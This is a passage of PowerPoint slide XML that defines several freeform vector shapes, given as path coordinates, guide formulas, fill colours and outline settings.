                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36183" name="Freeform 316"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1321" y="2687"/>
                <a:ext cx="95" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 95"/>
                  <a:gd name="T1" fmla="*/ 4 h 48"/>
                  <a:gd name="T2" fmla="*/ 20 w 95"/>
                  <a:gd name="T3" fmla="*/ 4 h 48"/>
                  <a:gd name="T4" fmla="*/ 24 w 95"/>
                  <a:gd name="T5" fmla="*/ 2 h 48"/>
                  <a:gd name="T6" fmla="*/ 28 w 95"/>
                  <a:gd name="T7" fmla="*/ 1 h 48"/>
                  <a:gd name="T8" fmla="*/ 34 w 95"/>
                  <a:gd name="T9" fmla="*/ 2 h 48"/>
                  <a:gd name="T10" fmla="*/ 37 w 95"/>
                  <a:gd name="T11" fmla="*/ 3 h 48"/>
                  <a:gd name="T12" fmla="*/ 47 w 95"/>
                  <a:gd name="T13" fmla="*/ 3 h 48"/>
                  <a:gd name="T14" fmla="*/ 52 w 95"/>
                  <a:gd name="T15" fmla="*/ 1 h 48"/>
                  <a:gd name="T16" fmla="*/ 55 w 95"/>
                  <a:gd name="T17" fmla="*/ 0 h 48"/>
                  <a:gd name="T18" fmla="*/ 59 w 95"/>
                  <a:gd name="T19" fmla="*/ 2 h 48"/>
                  <a:gd name="T20" fmla="*/ 65 w 95"/>
                  <a:gd name="T21" fmla="*/ 2 h 48"/>
                  <a:gd name="T22" fmla="*/ 70 w 95"/>
                  <a:gd name="T23" fmla="*/ 1 h 48"/>
                  <a:gd name="T24" fmla="*/ 75 w 95"/>
                  <a:gd name="T25" fmla="*/ 1 h 48"/>
                  <a:gd name="T26" fmla="*/ 78 w 95"/>
                  <a:gd name="T27" fmla="*/ 2 h 48"/>
                  <a:gd name="T28" fmla="*/ 82 w 95"/>
                  <a:gd name="T29" fmla="*/ 4 h 48"/>
                  <a:gd name="T30" fmla="*/ 82 w 95"/>
                  <a:gd name="T31" fmla="*/ 6 h 48"/>
                  <a:gd name="T32" fmla="*/ 81 w 95"/>
                  <a:gd name="T33" fmla="*/ 8 h 48"/>
                  <a:gd name="T34" fmla="*/ 83 w 95"/>
                  <a:gd name="T35" fmla="*/ 10 h 48"/>
                  <a:gd name="T36" fmla="*/ 89 w 95"/>
                  <a:gd name="T37" fmla="*/ 12 h 48"/>
                  <a:gd name="T38" fmla="*/ 93 w 95"/>
                  <a:gd name="T39" fmla="*/ 12 h 48"/>
                  <a:gd name="T40" fmla="*/ 95 w 95"/>
                  <a:gd name="T41" fmla="*/ 16 h 48"/>
                  <a:gd name="T42" fmla="*/ 84 w 95"/>
                  <a:gd name="T43" fmla="*/ 20 h 48"/>
                  <a:gd name="T44" fmla="*/ 81 w 95"/>
                  <a:gd name="T45" fmla="*/ 22 h 48"/>
                  <a:gd name="T46" fmla="*/ 79 w 95"/>
                  <a:gd name="T47" fmla="*/ 22 h 48"/>
                  <a:gd name="T48" fmla="*/ 76 w 95"/>
                  <a:gd name="T49" fmla="*/ 21 h 48"/>
                  <a:gd name="T50" fmla="*/ 74 w 95"/>
                  <a:gd name="T51" fmla="*/ 20 h 48"/>
                  <a:gd name="T52" fmla="*/ 72 w 95"/>
                  <a:gd name="T53" fmla="*/ 20 h 48"/>
                  <a:gd name="T54" fmla="*/ 70 w 95"/>
                  <a:gd name="T55" fmla="*/ 22 h 48"/>
                  <a:gd name="T56" fmla="*/ 66 w 95"/>
                  <a:gd name="T57" fmla="*/ 28 h 48"/>
                  <a:gd name="T58" fmla="*/ 58 w 95"/>
                  <a:gd name="T59" fmla="*/ 35 h 48"/>
                  <a:gd name="T60" fmla="*/ 52 w 95"/>
                  <a:gd name="T61" fmla="*/ 32 h 48"/>
                  <a:gd name="T62" fmla="*/ 49 w 95"/>
                  <a:gd name="T63" fmla="*/ 36 h 48"/>
                  <a:gd name="T64" fmla="*/ 42 w 95"/>
                  <a:gd name="T65" fmla="*/ 36 h 48"/>
                  <a:gd name="T66" fmla="*/ 42 w 95"/>
                  <a:gd name="T67" fmla="*/ 43 h 48"/>
                  <a:gd name="T68" fmla="*/ 40 w 95"/>
                  <a:gd name="T69" fmla="*/ 46 h 48"/>
                  <a:gd name="T70" fmla="*/ 38 w 95"/>
                  <a:gd name="T71" fmla="*/ 48 h 48"/>
                  <a:gd name="T72" fmla="*/ 31 w 95"/>
                  <a:gd name="T73" fmla="*/ 48 h 48"/>
                  <a:gd name="T74" fmla="*/ 29 w 95"/>
                  <a:gd name="T75" fmla="*/ 44 h 48"/>
                  <a:gd name="T76" fmla="*/ 29 w 95"/>
                  <a:gd name="T77" fmla="*/ 43 h 48"/>
                  <a:gd name="T78" fmla="*/ 25 w 95"/>
                  <a:gd name="T79" fmla="*/ 41 h 48"/>
                  <a:gd name="T80" fmla="*/ 26 w 95"/>
                  <a:gd name="T81" fmla="*/ 35 h 48"/>
                  <a:gd name="T82" fmla="*/ 25 w 95"/>
                  <a:gd name="T83" fmla="*/ 34 h 48"/>
                  <a:gd name="T84" fmla="*/ 23 w 95"/>
                  <a:gd name="T85" fmla="*/ 34 h 48"/>
                  <a:gd name="T86" fmla="*/ 19 w 95"/>
                  <a:gd name="T87" fmla="*/ 32 h 48"/>
                  <a:gd name="T88" fmla="*/ 16 w 95"/>
                  <a:gd name="T89" fmla="*/ 35 h 48"/>
                  <a:gd name="T90" fmla="*/ 14 w 95"/>
                  <a:gd name="T91" fmla="*/ 34 h 48"/>
                  <a:gd name="T92" fmla="*/ 13 w 95"/>
                  <a:gd name="T93" fmla="*/ 32 h 48"/>
                  <a:gd name="T94" fmla="*/ 9 w 95"/>
                  <a:gd name="T95" fmla="*/ 30 h 48"/>
                  <a:gd name="T96" fmla="*/ 6 w 95"/>
                  <a:gd name="T97" fmla="*/ 29 h 48"/>
                  <a:gd name="T98" fmla="*/ 5 w 95"/>
                  <a:gd name="T99" fmla="*/ 26 h 48"/>
                  <a:gd name="T100" fmla="*/ 0 w 95"/>
                  <a:gd name="T101" fmla="*/ 25 h 48"/>
                  <a:gd name="T102" fmla="*/ 3 w 95"/>
                  <a:gd name="T103" fmla="*/ 23 h 48"/>
                  <a:gd name="T104" fmla="*/ 2 w 95"/>
                  <a:gd name="T105" fmla="*/ 18 h 48"/>
                  <a:gd name="T106" fmla="*/ 3 w 95"/>
                  <a:gd name="T107" fmla="*/ 15 h 48"/>
                  <a:gd name="T108" fmla="*/ 7 w 95"/>
                  <a:gd name="T109" fmla="*/ 13 h 48"/>
                  <a:gd name="T110" fmla="*/ 17 w 95"/>
                  <a:gd name="T111" fmla="*/ 4 h 48"/>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95"/>
                  <a:gd name="T169" fmla="*/ 0 h 48"/>
                  <a:gd name="T170" fmla="*/ 95 w 95"/>
                  <a:gd name="T171" fmla="*/ 48 h 48"/>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95" h="48">
                    <a:moveTo>
                      <a:pt x="17" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="20" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36184" name="Freeform 317"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309" y="2712"/>
                <a:ext cx="38" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 38"/>
                  <a:gd name="T1" fmla="*/ 16 h 21"/>
                  <a:gd name="T2" fmla="*/ 38 w 38"/>
                  <a:gd name="T3" fmla="*/ 16 h 21"/>
                  <a:gd name="T4" fmla="*/ 36 w 38"/>
                  <a:gd name="T5" fmla="*/ 17 h 21"/>
                  <a:gd name="T6" fmla="*/ 36 w 38"/>
                  <a:gd name="T7" fmla="*/ 19 h 21"/>
                  <a:gd name="T8" fmla="*/ 35 w 38"/>
                  <a:gd name="T9" fmla="*/ 21 h 21"/>
                  <a:gd name="T10" fmla="*/ 30 w 38"/>
                  <a:gd name="T11" fmla="*/ 21 h 21"/>
                  <a:gd name="T12" fmla="*/ 24 w 38"/>
                  <a:gd name="T13" fmla="*/ 20 h 21"/>
                  <a:gd name="T14" fmla="*/ 11 w 38"/>
                  <a:gd name="T15" fmla="*/ 16 h 21"/>
                  <a:gd name="T16" fmla="*/ 2 w 38"/>
                  <a:gd name="T17" fmla="*/ 13 h 21"/>
                  <a:gd name="T18" fmla="*/ 0 w 38"/>
                  <a:gd name="T19" fmla="*/ 11 h 21"/>
                  <a:gd name="T20" fmla="*/ 0 w 38"/>
                  <a:gd name="T21" fmla="*/ 10 h 21"/>
                  <a:gd name="T22" fmla="*/ 4 w 38"/>
                  <a:gd name="T23" fmla="*/ 6 h 21"/>
                  <a:gd name="T24" fmla="*/ 6 w 38"/>
                  <a:gd name="T25" fmla="*/ 6 h 21"/>
                  <a:gd name="T26" fmla="*/ 7 w 38"/>
                  <a:gd name="T27" fmla="*/ 4 h 21"/>
                  <a:gd name="T28" fmla="*/ 9 w 38"/>
                  <a:gd name="T29" fmla="*/ 3 h 21"/>
                  <a:gd name="T30" fmla="*/ 8 w 38"/>
                  <a:gd name="T31" fmla="*/ 2 h 21"/>
                  <a:gd name="T32" fmla="*/ 9 w 38"/>
                  <a:gd name="T33" fmla="*/ 0 h 21"/>
                  <a:gd name="T34" fmla="*/ 12 w 38"/>
                  <a:gd name="T35" fmla="*/ 0 h 21"/>
                  <a:gd name="T36" fmla="*/ 17 w 38"/>
                  <a:gd name="T37" fmla="*/ 1 h 21"/>
                  <a:gd name="T38" fmla="*/ 18 w 38"/>
                  <a:gd name="T39" fmla="*/ 4 h 21"/>
                  <a:gd name="T40" fmla="*/ 21 w 38"/>
                  <a:gd name="T41" fmla="*/ 5 h 21"/>
                  <a:gd name="T42" fmla="*/ 25 w 38"/>
                  <a:gd name="T43" fmla="*/ 7 h 21"/>
                  <a:gd name="T44" fmla="*/ 26 w 38"/>
                  <a:gd name="T45" fmla="*/ 9 h 21"/>
                  <a:gd name="T46" fmla="*/ 28 w 38"/>
                  <a:gd name="T47" fmla="*/ 10 h 21"/>
                  <a:gd name="T48" fmla="*/ 31 w 38"/>
                  <a:gd name="T49" fmla="*/ 7 h 21"/>
                  <a:gd name="T50" fmla="*/ 35 w 38"/>
                  <a:gd name="T51" fmla="*/ 9 h 21"/>
                  <a:gd name="T52" fmla="*/ 37 w 38"/>
                  <a:gd name="T53" fmla="*/ 9 h 21"/>
                  <a:gd name="T54" fmla="*/ 38 w 38"/>
                  <a:gd name="T55" fmla="*/ 10 h 21"/>
                  <a:gd name="T56" fmla="*/ 37 w 38"/>
                  <a:gd name="T57" fmla="*/ 16 h 21"/>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38"/>
                  <a:gd name="T88" fmla="*/ 0 h 21"/>
                  <a:gd name="T89" fmla="*/ 38 w 38"/>
                  <a:gd name="T90" fmla="*/ 21 h 21"/>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38" h="21">
                    <a:moveTo>
                      <a:pt x="37" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="38" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36185" name="Freeform 318"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309" y="2712"/>
                <a:ext cx="38" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 38"/>
                  <a:gd name="T1" fmla="*/ 16 h 21"/>
                  <a:gd name="T2" fmla="*/ 38 w 38"/>
                  <a:gd name="T3" fmla="*/ 16 h 21"/>
                  <a:gd name="T4" fmla="*/ 36 w 38"/>
                  <a:gd name="T5" fmla="*/ 17 h 21"/>
                  <a:gd name="T6" fmla="*/ 36 w 38"/>
                  <a:gd name="T7" fmla="*/ 19 h 21"/>
                  <a:gd name="T8" fmla="*/ 35 w 38"/>
                  <a:gd name="T9" fmla="*/ 21 h 21"/>
                  <a:gd name="T10" fmla="*/ 30 w 38"/>
                  <a:gd name="T11" fmla="*/ 21 h 21"/>
                  <a:gd name="T12" fmla="*/ 24 w 38"/>
                  <a:gd name="T13" fmla="*/ 20 h 21"/>
                  <a:gd name="T14" fmla="*/ 11 w 38"/>
                  <a:gd name="T15" fmla="*/ 16 h 21"/>
                  <a:gd name="T16" fmla="*/ 2 w 38"/>
                  <a:gd name="T17" fmla="*/ 13 h 21"/>
                  <a:gd name="T18" fmla="*/ 0 w 38"/>
                  <a:gd name="T19" fmla="*/ 11 h 21"/>
                  <a:gd name="T20" fmla="*/ 0 w 38"/>
                  <a:gd name="T21" fmla="*/ 10 h 21"/>
                  <a:gd name="T22" fmla="*/ 4 w 38"/>
                  <a:gd name="T23" fmla="*/ 6 h 21"/>
                  <a:gd name="T24" fmla="*/ 6 w 38"/>
                  <a:gd name="T25" fmla="*/ 6 h 21"/>
                  <a:gd name="T26" fmla="*/ 7 w 38"/>
                  <a:gd name="T27" fmla="*/ 4 h 21"/>
                  <a:gd name="T28" fmla="*/ 9 w 38"/>
                  <a:gd name="T29" fmla="*/ 3 h 21"/>
                  <a:gd name="T30" fmla="*/ 8 w 38"/>
                  <a:gd name="T31" fmla="*/ 2 h 21"/>
                  <a:gd name="T32" fmla="*/ 9 w 38"/>
                  <a:gd name="T33" fmla="*/ 0 h 21"/>
                  <a:gd name="T34" fmla="*/ 12 w 38"/>
                  <a:gd name="T35" fmla="*/ 0 h 21"/>
                  <a:gd name="T36" fmla="*/ 17 w 38"/>
                  <a:gd name="T37" fmla="*/ 1 h 21"/>
                  <a:gd name="T38" fmla="*/ 18 w 38"/>
                  <a:gd name="T39" fmla="*/ 4 h 21"/>
                  <a:gd name="T40" fmla="*/ 21 w 38"/>
                  <a:gd name="T41" fmla="*/ 5 h 21"/>
                  <a:gd name="T42" fmla="*/ 25 w 38"/>
                  <a:gd name="T43" fmla="*/ 7 h 21"/>
                  <a:gd name="T44" fmla="*/ 26 w 38"/>
                  <a:gd name="T45" fmla="*/ 9 h 21"/>
                  <a:gd name="T46" fmla="*/ 28 w 38"/>
                  <a:gd name="T47" fmla="*/ 10 h 21"/>
                  <a:gd name="T48" fmla="*/ 31 w 38"/>
                  <a:gd name="T49" fmla="*/ 7 h 21"/>
                  <a:gd name="T50" fmla="*/ 35 w 38"/>
                  <a:gd name="T51" fmla="*/ 9 h 21"/>
                  <a:gd name="T52" fmla="*/ 37 w 38"/>
                  <a:gd name="T53" fmla="*/ 9 h 21"/>
                  <a:gd name="T54" fmla="*/ 38 w 38"/>
                  <a:gd name="T55" fmla="*/ 10 h 21"/>
                  <a:gd name="T56" fmla="*/ 37 w 38"/>
                  <a:gd name="T57" fmla="*/ 16 h 21"/>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38"/>
                  <a:gd name="T88" fmla="*/ 0 h 21"/>
                  <a:gd name="T89" fmla="*/ 38 w 38"/>
                  <a:gd name="T90" fmla="*/ 21 h 21"/>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38" h="21">
                    <a:moveTo>
                      <a:pt x="37" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="38" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36186" name="Freeform 319"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2355" y="1520"/>
                <a:ext cx="169" cy="117"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 169"/>
                  <a:gd name="T1" fmla="*/ 33 h 117"/>
                  <a:gd name="T2" fmla="*/ 10 w 169"/>
                  <a:gd name="T3" fmla="*/ 31 h 117"/>
                  <a:gd name="T4" fmla="*/ 12 w 169"/>
                  <a:gd name="T5" fmla="*/ 25 h 117"/>
                  <a:gd name="T6" fmla="*/ 12 w 169"/>
                  <a:gd name="T7" fmla="*/ 13 h 117"/>
                  <a:gd name="T8" fmla="*/ 20 w 169"/>
                  <a:gd name="T9" fmla="*/ 20 h 117"/>
                  <a:gd name="T10" fmla="*/ 27 w 169"/>
                  <a:gd name="T11" fmla="*/ 18 h 117"/>
                  <a:gd name="T12" fmla="*/ 22 w 169"/>
                  <a:gd name="T13" fmla="*/ 7 h 117"/>
                  <a:gd name="T14" fmla="*/ 32 w 169"/>
                  <a:gd name="T15" fmla="*/ 7 h 117"/>
                  <a:gd name="T16" fmla="*/ 44 w 169"/>
                  <a:gd name="T17" fmla="*/ 13 h 117"/>
                  <a:gd name="T18" fmla="*/ 46 w 169"/>
                  <a:gd name="T19" fmla="*/ 30 h 117"/>
                  <a:gd name="T20" fmla="*/ 49 w 169"/>
                  <a:gd name="T21" fmla="*/ 49 h 117"/>
                  <a:gd name="T22" fmla="*/ 56 w 169"/>
                  <a:gd name="T23" fmla="*/ 40 h 117"/>
                  <a:gd name="T24" fmla="*/ 64 w 169"/>
                  <a:gd name="T25" fmla="*/ 35 h 117"/>
                  <a:gd name="T26" fmla="*/ 63 w 169"/>
                  <a:gd name="T27" fmla="*/ 18 h 117"/>
                  <a:gd name="T28" fmla="*/ 71 w 169"/>
                  <a:gd name="T29" fmla="*/ 22 h 117"/>
                  <a:gd name="T30" fmla="*/ 77 w 169"/>
                  <a:gd name="T31" fmla="*/ 31 h 117"/>
                  <a:gd name="T32" fmla="*/ 80 w 169"/>
                  <a:gd name="T33" fmla="*/ 29 h 117"/>
                  <a:gd name="T34" fmla="*/ 80 w 169"/>
                  <a:gd name="T35" fmla="*/ 18 h 117"/>
                  <a:gd name="T36" fmla="*/ 88 w 169"/>
                  <a:gd name="T37" fmla="*/ 15 h 117"/>
                  <a:gd name="T38" fmla="*/ 96 w 169"/>
                  <a:gd name="T39" fmla="*/ 26 h 117"/>
                  <a:gd name="T40" fmla="*/ 101 w 169"/>
                  <a:gd name="T41" fmla="*/ 24 h 117"/>
                  <a:gd name="T42" fmla="*/ 105 w 169"/>
                  <a:gd name="T43" fmla="*/ 18 h 117"/>
                  <a:gd name="T44" fmla="*/ 121 w 169"/>
                  <a:gd name="T45" fmla="*/ 17 h 117"/>
                  <a:gd name="T46" fmla="*/ 124 w 169"/>
                  <a:gd name="T47" fmla="*/ 0 h 117"/>
